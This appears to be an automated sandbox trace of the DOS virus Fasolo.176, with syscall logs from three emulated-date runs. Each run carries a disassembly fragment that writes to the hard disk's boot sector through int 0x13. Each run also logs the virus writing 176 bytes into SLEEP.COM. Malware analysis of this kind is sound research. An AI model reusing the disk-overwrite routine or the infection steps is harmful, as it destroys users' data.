Sample viewer

vx.netlux.org/Virus.DOS.Fasolo.176

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:32:01.035908878Z 42 PC: 12a44 | Get date
0x12a44: cmp dh, 0xc
0x12a47: jne 0x12a94
0x12a49: sbb byte ptr [bp + di], 4
0x12a4c: jne 0x12a94
0x12a4e: in al, 0x21
0x12a50: or al, 2
0x12a52: out 0x21, al
0x12a54: mov ah, 2
0x12a56: mov dl, 7
0x12a58: int 0x21
0x12a5a: mov ah, 3
0x12a5c: mov al, 0x80
0x12a5e: mov ch, 0
0x12a60: mov cl, 1
0x12a62: mov dh, 0
0x12a64: mov dl, 0x80
0x12a66: mov bx, 0
0x12a69: int 0x13
0x12a6b: sti
0x12a6c: mov al, 0x10
2018-12-17T22:32:01.038584835Z 78 PC: 12a9b | Find first file
2018-12-17T22:32:01.044472317Z 61 PC: 12aa3 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:32:01.050815557Z 63 PC: 12aae | Read file or device (Read 2 bytes on handle 5)
2018-12-17T22:32:01.057347085Z 62 PC: 12ab2 | Close file
2018-12-17T22:32:01.058997589Z 61 PC: 12acd | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:32:01.06538771Z 64 PC: 12ad8 | Write file or device (Write 176 bytes on handle 5)

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":5716,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:55:17.597223821Z 42 PC: 12a44 | Get date
0x12a44: cmp dh, 0xc
0x12a47: jne 0x12a94
0x12a49: sbb byte ptr [bp + di], 4
0x12a4c: jne 0x12a94
0x12a4e: in al, 0x21
0x12a50: or al, 2
0x12a52: out 0x21, al
0x12a54: mov ah, 2
0x12a56: mov dl, 7
0x12a58: int 0x21
0x12a5a: mov ah, 3
0x12a5c: mov al, 0x80
0x12a5e: mov ch, 0
0x12a60: mov cl, 1
0x12a62: mov dh, 0
0x12a64: mov dl, 0x80
0x12a66: mov bx, 0
0x12a69: int 0x13
0x12a6b: sti
0x12a6c: mov al, 0x10
2018-12-25T11:55:17.602426176Z 78 PC: 12a9b | Find first file
2018-12-25T11:55:17.608132935Z 61 PC: 12aa3 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:55:17.614317823Z 63 PC: 12aae | Read file or device (Read 2 bytes on handle 5)
2018-12-25T11:55:17.621283107Z 62 PC: 12ab2 | Close file
2018-12-25T11:55:17.622992128Z 61 PC: 12acd | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:55:17.634124443Z 64 PC: 12ad8 | Write file or device (Write 176 bytes on handle 5)

{"DateBased":true,"Day":1,"Month":12,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":5716,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:55:17.729065351Z 42 PC: 12a44 | Get date
0x12a44: cmp dh, 0xc
0x12a47: jne 0x12a94
0x12a49: sbb byte ptr [bp + di], 4
0x12a4c: jne 0x12a94
0x12a4e: in al, 0x21
0x12a50: or al, 2
0x12a52: out 0x21, al
0x12a54: mov ah, 2
0x12a56: mov dl, 7
0x12a58: int 0x21
0x12a5a: mov ah, 3
0x12a5c: mov al, 0x80
0x12a5e: mov ch, 0
0x12a60: mov cl, 1
0x12a62: mov dh, 0
0x12a64: mov dl, 0x80
0x12a66: mov bx, 0
0x12a69: int 0x13
0x12a6b: sti
0x12a6c: mov al, 0x10
2018-12-25T11:55:17.732062412Z 78 PC: 12a9b | Find first file
2018-12-25T11:55:17.738686Z 61 PC: 12aa3 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:55:17.745840661Z 63 PC: 12aae | Read file or device (Read 2 bytes on handle 5)
2018-12-25T11:55:17.758880668Z 62 PC: 12ab2 | Close file
2018-12-25T11:55:17.761256462Z 61 PC: 12acd | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:55:17.768808735Z 64 PC: 12ad8 | Write file or device (Write 176 bytes on handle 5)